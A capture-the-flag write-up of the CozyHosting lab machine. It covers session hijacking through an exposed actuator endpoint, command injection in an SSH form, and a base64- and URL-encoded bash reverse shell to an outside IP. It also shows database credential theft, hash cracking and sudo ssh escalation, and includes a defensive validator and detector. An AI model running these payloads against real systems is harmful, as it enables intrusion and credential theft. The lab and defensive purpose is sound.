CozyHosting

Write-up author: jon-brandy

Lesson learned:

  • Accessing postgres

image

STEPS:

PORT SCANNING

┌──(brandy㉿bread-yolk)-[~]
└─$ nmap -p- -sVC 10.10.11.230 --min-rate 1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 22:59 PDT
Nmap scan report for 10.10.11.230
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds

  1. Based on the nmap results, the machine runs a webapp and accepts ssh logins.

WEBAPP

image

  1. Wappalyzer itself shows us minimal information (little about versions).

image

  1. Hence I ran dirsearch to enumerate the directories and files available on this webapp.

RESULTS

image

  1. The admin page and the actuator directory are of interest here.
  2. Opening actuator/sessions results in this:

image

image

  1. Notice there's a session for the user kanderson (information disclosure).
  2. Let's replace our session with kanderson's, then refresh the page.

image

RESULT

image

  1. Scrolling down, you will see an input box.

image

  1. This is of interest. To identify the vulnerability, let's capture the request we send using Burp Suite.
  2. Let's fill the hostname with our tun0 address and leave the username empty; we just want to see what response the server gives.

IN BURPSUITE

image

  1. Notice the server responds with an error from the ssh command.
  2. This makes it clear that the vulnerability is command injection.
  3. The idea is to use a basic bash reverse shell payload:

BASH REVERSE SHELL PAYLOAD

bash -i >& /dev/tcp/10.10.16.14/1337 0>&1

ENCODE IT TO BASE64 (adding -w 0 to make sure the output is a single line)

echo "bash -i >& /dev/tcp/10.10.16.14/1337 0>&1" | base64 -w 0

RESULT

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK

  1. Great! Now for the final payload: because we want the server to decode our payload first and then execute it, we pipe it through base64 -d.
  2. But we also need to URL-encode it to deal with all the spaces.
  3. The best practice is to use --> ${IFS%??}, which expands to a single space, instead of literal spaces or other characters that may be treated as delimiters by the shell.
  4. Then we URL-encode the payload, set up a listener and send our payload.

PAYLOAD

Original one:

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK" | base64 -d | bash;

Replacing whitespace with ${IFS%??}:

;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

URL-ENCODE:

%3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA%2BJjEK%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D%2Dd%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B

RESULT

image
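From the defender's side, the root cause is that the hostname and username fields reach a shell. The following added example (not the CozyHosting application's code; all names are assumptions) shows an allow-list validator and a no-shell argv builder that would reject the injected value, plus an analyst helper that URL-decodes a captured field and normalises ${IFS%??} so the carried command becomes readable. The captured field is the URL-encoded payload from this write-up, embedded as test input.

```python
import re
from urllib.parse import unquote

# Captured form field, copied from the URL-encoded payload in this write-up (constructed test input).
CAPTURED_FIELD = (
    "%3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA%2BJjEK%22"
    "%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D%2Dd"
    "%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B"
)

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Conventional Linux user name: nothing a shell could interpret.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_valid_target(hostname: str, username: str) -> bool:
    """Allow-list both form fields before they get anywhere near a command."""
    return bool(HOSTNAME_RE.match(hostname) and USERNAME_RE.match(username))


def build_ssh_argv(hostname: str, username: str) -> list:
    """Hardened form: build ssh as an argv list (no shell) after validation.

    An argv list is never re-parsed by a shell, so ';', '|' and ${IFS} inside a
    field would stay inside that single argument even if the allow-list were
    bypassed.  Execute it with subprocess.run(argv) and the default shell=False.
    """
    if not is_valid_target(hostname, username):
        raise ValueError("rejected host/user input")
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
            f"{username}@{hostname}", "true"]


def normalise_payload(form_value: str) -> str:
    """Analyst helper: URL-decode a captured field and turn ${IFS%??} back into spaces.

    ${IFS%??} strips the last two characters of IFS (space, tab, newline) and so
    expands to a single space, which is why the payload needs no literal spaces.
    """
    return unquote(form_value).replace("${IFS%??}", " ")


def looks_injected(form_value: str) -> bool:
    """Detection: a hostname or user name never needs shell metacharacters."""
    return re.search(r"[;|&`$(){}<>\\\n]", normalise_payload(form_value)) is not None
```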

  1. At this point we can't get the user flag, because our shell isn't running as "josh".

image

  1. Notice there's a .jar file, which might be of interest.
  2. Let's set up a Python HTTP server on the remote host and download the file to our local machine.

NOTES: set up the Python server on a port other than 80.

RESULT

image

  1. If you look closely, the download did not complete fully.
  2. Hmm, confusing, but anyway since we opened the Python server on port 8000, browsing to the remote host on port 8000 shows this:

image

  1. Let's download it manually.

image

DECOMPILING IT WITH JD-GUI

image

  1. Interesting, we found a postgres credential.
  2. Let's access psql on the remote server.

image

  1. Run --> \l to list all available databases.

image

  1. Great! Let's connect to cozyhosting --> run \c cozyhosting.
  2. To list all the tables, run --> \d.

image

DUMPING THE users TABLE.

image

  1. Interesting, the users table is what we want. Let's select everything from it.

SELECT * FROM public.users;

image

  1. Awesome! Let's crack all the hashed passwords with john.
  2. I started cracking the first hash with john and, while waiting for john to crack it, I identified the hash type using hashid, which lets us use hashcat.

image

  1. Because time is money 🙏🏼.

GRABBING THE HASHCAT MODE FOR BCRYPT.

image

  1. Found nothing for kanderson's hash.
  2. But succeeded in cracking the password for admin's hash.

image

  1. Hmm.. Remembering that the remote /home directory belongs to josh, we suspect potential password reuse.
  2. Turns out it is.

RESULT

image

GETTING USER FLAG

image

USER FLAG

83cfd0650592f468972d63e44761211a

  1. Checking sudo permissions for josh results in this:

image

  1. The ssh command is allowed to run as root.
  2. Searching the internet for the ssh GTFOBins entry leads to this --> https://gtfobins.github.io/gtfobins/ssh/

image

  1. Using it.

image

  1. Successfully gained root!

GETTING ROOT FLAG

image

ROOT FLAG

5783572fa5559507b67cfbd6636c934e